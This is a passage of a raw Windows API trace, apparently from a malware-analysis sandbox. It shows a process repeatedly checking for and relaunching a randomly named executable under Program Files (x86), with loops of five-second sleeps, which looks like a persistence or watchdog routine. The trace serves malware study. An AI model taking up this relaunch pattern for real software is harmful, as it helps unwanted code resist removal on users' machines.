EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2290, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.070] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.070] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64c00) returned 1 [0202.070] NtQueryInformationFile (in: FileHandle=0x2290, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.070] NtClose (Handle=0x2290) returned 0x0 [0202.070] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.070] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2290, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.071] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.071] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0202.071] NtClose (Handle=0x2290) returned 0x0 [0202.083] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1f90, hThread=0x2290, dwProcessId=0x1014, dwThreadId=0x12a0), hNewToken=0x0) returned 1 [0202.094] Sleep (dwMilliseconds=0x1388) [0202.096] Sleep (dwMilliseconds=0x1388) [0202.097] Sleep (dwMilliseconds=0x1388) [0202.099] Sleep (dwMilliseconds=0x1388) [0202.100] Sleep (dwMilliseconds=0x1388) [0202.102] Sleep (dwMilliseconds=0x1388) [0202.103] Sleep (dwMilliseconds=0x1388) [0202.110] Sleep (dwMilliseconds=0x1388) [0202.112] Sleep (dwMilliseconds=0x1388) [0202.113] Sleep (dwMilliseconds=0x1388) [0202.115] Sleep (dwMilliseconds=0x1388) [0202.116] Sleep (dwMilliseconds=0x1388) [0202.118] Sleep (dwMilliseconds=0x1388) [0202.119] Sleep (dwMilliseconds=0x1388) [0202.127] Sleep (dwMilliseconds=0x1388) [0202.128] Sleep (dwMilliseconds=0x1388) [0202.129] Sleep (dwMilliseconds=0x1388) [0202.131] Sleep (dwMilliseconds=0x1388) [0202.132] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.132] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1b24, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.132] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.132] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65200) returned 1 [0202.132] NtQueryInformationFile (in: FileHandle=0x1b24, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.132] NtClose (Handle=0x1b24) returned 0x0 [0202.133] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.133] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1b24, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.133] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.133] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65680) returned 1 [0202.133] NtClose (Handle=0x1b24) returned 0x0 [0202.135] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0xba8, hThread=0x1b24, dwProcessId=0x1034, dwThreadId=0x6d4), hNewToken=0x0) returned 1 [0202.146] Sleep (dwMilliseconds=0x1388) [0202.147] Sleep (dwMilliseconds=0x1388) [0202.149] Sleep (dwMilliseconds=0x1388) [0202.150] Sleep (dwMilliseconds=0x1388) [0202.152] Sleep (dwMilliseconds=0x1388) [0202.153] Sleep (dwMilliseconds=0x1388) [0202.155] Sleep (dwMilliseconds=0x1388) [0202.156] Sleep (dwMilliseconds=0x1388) [0202.169] Sleep (dwMilliseconds=0x1388) [0202.172] Sleep (dwMilliseconds=0x1388) [0202.173] Sleep (dwMilliseconds=0x1388) [0202.177] Sleep (dwMilliseconds=0x1388) [0202.178] Sleep (dwMilliseconds=0x1388) [0202.180] Sleep (dwMilliseconds=0x1388) [0202.181] Sleep (dwMilliseconds=0x1388) [0202.183] Sleep (dwMilliseconds=0x1388) [0202.184] Sleep (dwMilliseconds=0x1388) [0202.186] Sleep (dwMilliseconds=0x1388) [0202.187] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.187] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1994, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.187] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.187] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c66080) returned 1 [0202.187] NtQueryInformationFile (in: FileHandle=0x1994, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.187] NtClose (Handle=0x1994) returned 0x0 [0202.188] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.188] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1994, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.188] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.188] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65500) returned 1 [0202.188] NtClose (Handle=0x1994) returned 0x0 [0202.190] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1abc, hThread=0x1994, dwProcessId=0x102c, dwThreadId=0x13f8), hNewToken=0x0) returned 1 [0202.200] Sleep (dwMilliseconds=0x1388) [0202.202] Sleep (dwMilliseconds=0x1388) [0202.204] Sleep (dwMilliseconds=0x1388) [0202.206] Sleep (dwMilliseconds=0x1388) [0202.207] Sleep (dwMilliseconds=0x1388) [0202.209] Sleep (dwMilliseconds=0x1388) [0202.210] Sleep (dwMilliseconds=0x1388) [0202.221] Sleep (dwMilliseconds=0x1388) [0202.224] Sleep (dwMilliseconds=0x1388) [0202.226] Sleep (dwMilliseconds=0x1388) [0202.227] Sleep (dwMilliseconds=0x1388) [0202.229] Sleep (dwMilliseconds=0x1388) [0202.230] Sleep (dwMilliseconds=0x1388) [0202.232] Sleep (dwMilliseconds=0x1388) [0202.233] Sleep (dwMilliseconds=0x1388) [0202.235] Sleep (dwMilliseconds=0x1388) [0202.236] Sleep (dwMilliseconds=0x1388) [0202.238] Sleep (dwMilliseconds=0x1388) [0202.241] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.241] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x132c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.241] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.241] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c66000) returned 1 [0202.241] NtQueryInformationFile (in: FileHandle=0x132c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.241] NtClose (Handle=0x132c) returned 0x0 [0202.242] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.242] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x132c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.242] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.242] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0202.242] NtClose (Handle=0x132c) returned 0x0 [0202.244] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1328, hThread=0x132c, dwProcessId=0x103c, dwThreadId=0x6d8), hNewToken=0x0) returned 1 [0202.253] Sleep (dwMilliseconds=0x1388) [0202.256] Sleep (dwMilliseconds=0x1388) [0202.258] Sleep (dwMilliseconds=0x1388) [0202.261] Sleep (dwMilliseconds=0x1388) [0202.262] Sleep (dwMilliseconds=0x1388) [0202.264] Sleep (dwMilliseconds=0x1388) [0202.265] Sleep (dwMilliseconds=0x1388) [0202.267] Sleep (dwMilliseconds=0x1388) [0202.268] Sleep (dwMilliseconds=0x1388) [0202.270] Sleep (dwMilliseconds=0x1388) [0202.273] Sleep (dwMilliseconds=0x1388) [0202.274] Sleep (dwMilliseconds=0x1388) [0202.281] Sleep (dwMilliseconds=0x1388) [0202.282] Sleep (dwMilliseconds=0x1388) [0202.284] Sleep (dwMilliseconds=0x1388) [0202.285] Sleep (dwMilliseconds=0x1388) [0202.288] Sleep (dwMilliseconds=0x1388) [0202.290] Sleep (dwMilliseconds=0x1388) [0202.291] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.291] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1bb8, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.291] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.291] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c66000) returned 1 [0202.291] NtQueryInformationFile (in: FileHandle=0x1bb8, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.291] NtClose (Handle=0x1bb8) returned 0x0 [0202.292] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.292] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1bb8, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.292] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.292] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0202.292] NtClose (Handle=0x1bb8) returned 0x0 [0202.294] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1980, hThread=0x1bb8, dwProcessId=0x108c, dwThreadId=0x5a4), hNewToken=0x0) returned 1 [0202.305] Sleep (dwMilliseconds=0x1388) [0202.309] Sleep (dwMilliseconds=0x1388) [0202.310] Sleep (dwMilliseconds=0x1388) [0202.312] Sleep (dwMilliseconds=0x1388) [0202.313] Sleep (dwMilliseconds=0x1388) [0202.315] Sleep (dwMilliseconds=0x1388) [0202.316] Sleep (dwMilliseconds=0x1388) [0202.318] Sleep (dwMilliseconds=0x1388) [0202.320] Sleep (dwMilliseconds=0x1388) [0202.322] Sleep (dwMilliseconds=0x1388) [0202.324] Sleep (dwMilliseconds=0x1388) [0202.325] Sleep (dwMilliseconds=0x1388) [0202.327] Sleep (dwMilliseconds=0x1388) [0202.328] Sleep (dwMilliseconds=0x1388) [0202.330] Sleep (dwMilliseconds=0x1388) [0202.331] Sleep (dwMilliseconds=0x1388) [0202.333] Sleep (dwMilliseconds=0x1388) [0202.338] Sleep (dwMilliseconds=0x1388) [0202.339] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.339] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x12b8, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.339] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.340] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65e00) returned 1 [0202.340] NtQueryInformationFile (in: FileHandle=0x12b8, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.340] NtClose (Handle=0x12b8) returned 0x0 [0202.340] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.340] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x12b8, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.340] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.340] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65680) returned 1 [0202.340] NtClose (Handle=0x12b8) returned 0x0 [0202.343] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1208, hThread=0x12b8, dwProcessId=0x1084, dwThreadId=0x7a4), hNewToken=0x0) returned 1 [0202.384] Sleep (dwMilliseconds=0x1388) [0202.394] Sleep (dwMilliseconds=0x1388) [0202.396] Sleep (dwMilliseconds=0x1388) [0202.452] Sleep (dwMilliseconds=0x1388) [0202.454] Sleep (dwMilliseconds=0x1388) [0202.456] Sleep (dwMilliseconds=0x1388) [0202.458] Sleep (dwMilliseconds=0x1388) [0202.474] Sleep (dwMilliseconds=0x1388) [0202.478] Sleep (dwMilliseconds=0x1388) [0202.482] Sleep (dwMilliseconds=0x1388) [0202.487] Sleep (dwMilliseconds=0x1388) [0202.488] Sleep (dwMilliseconds=0x1388) [0202.489] Sleep (dwMilliseconds=0x1388) [0202.491] Sleep (dwMilliseconds=0x1388) [0202.493] Sleep (dwMilliseconds=0x1388) [0202.494] Sleep (dwMilliseconds=0x1388) [0202.495] Sleep (dwMilliseconds=0x1388) [0202.497] Sleep (dwMilliseconds=0x1388) [0202.498] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.499] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0xbb4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.502] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.502] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64180) returned 1 [0202.502] NtQueryInformationFile (in: FileHandle=0xbb4, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.503] NtClose (Handle=0xbb4) returned 0x0 [0202.503] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 